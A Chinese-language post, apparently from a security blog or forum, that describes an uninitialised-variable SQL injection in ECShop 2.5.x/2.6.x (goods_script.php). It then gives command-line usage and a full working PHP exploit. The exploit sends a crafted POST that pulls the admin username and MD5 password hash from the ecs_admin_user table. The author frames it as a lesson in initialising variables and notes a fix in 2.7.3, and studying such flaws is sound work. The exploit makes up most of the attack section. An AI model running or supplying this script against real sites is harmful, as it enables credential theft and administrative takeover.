简要:
这个漏洞不是我发现的。现在目前2.7.3也已经改了,所以放上来,是为了说明变量初始化的重要性。
refer link:http://bbs.wolvez.org/viewtopic.php?pid=179#p179
内容:
影响2.5.x和2.6.x,其他版本未测试
goods_script.php44行:
- if (empty($_GET['type'])) { ... }
- elseif ($_GET['type'] == 'collection') { ... }
- $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
- $res = $db->query($sql);
$sql没有初始化,很明显的一个漏洞:)
攻击方式:
在本地php.exe文件所在的目录下新建一个injection.php文件 ,然后通过cmd命令执行(unix下同理)。
执行命令 d:/php>php.exe injection.php ecshop,localhost.com /
解释 以上传递的参数以空格间隔开即可 $argv[0] = injection.php;$argv[1] = ecshop,localhost.com;$argv[2] =/;
攻击代码:
- <?
- error_reporting(7);
- ini_set('max_execution_time', 0);
- $host = $argv[1];$path = $argv[2];
- $resp = send();
- preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);
- if ($hash)
- exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
- else
- exit("Exploit Failed!\n");
- function send(){
- global $host, $path;
- $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';
- $data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n";
- $data .= "Accept: */*\r\n";
- $data .= "Accept-Language: zh-cn\r\n";
- $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
- $data .= "Host: $host\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n";
- $data .= "Connection: Close\r\n\r\n";
- $data .= $cmd;
- $fp = fsockopen($host, 80);
- fputs($fp, $data);
- $resp = '';
- while ($fp && !feof($fp))
- $resp .= fread($fp, 1024);
- return $resp;}
- ?>
代码解释:
获取传递的参数argv,组装一个包含了sql自定义攻击代码的请求给goods_script.php文件,当type为一般数字的时候 就直接去连接 limit 10 了,一切源自没有初始化变量。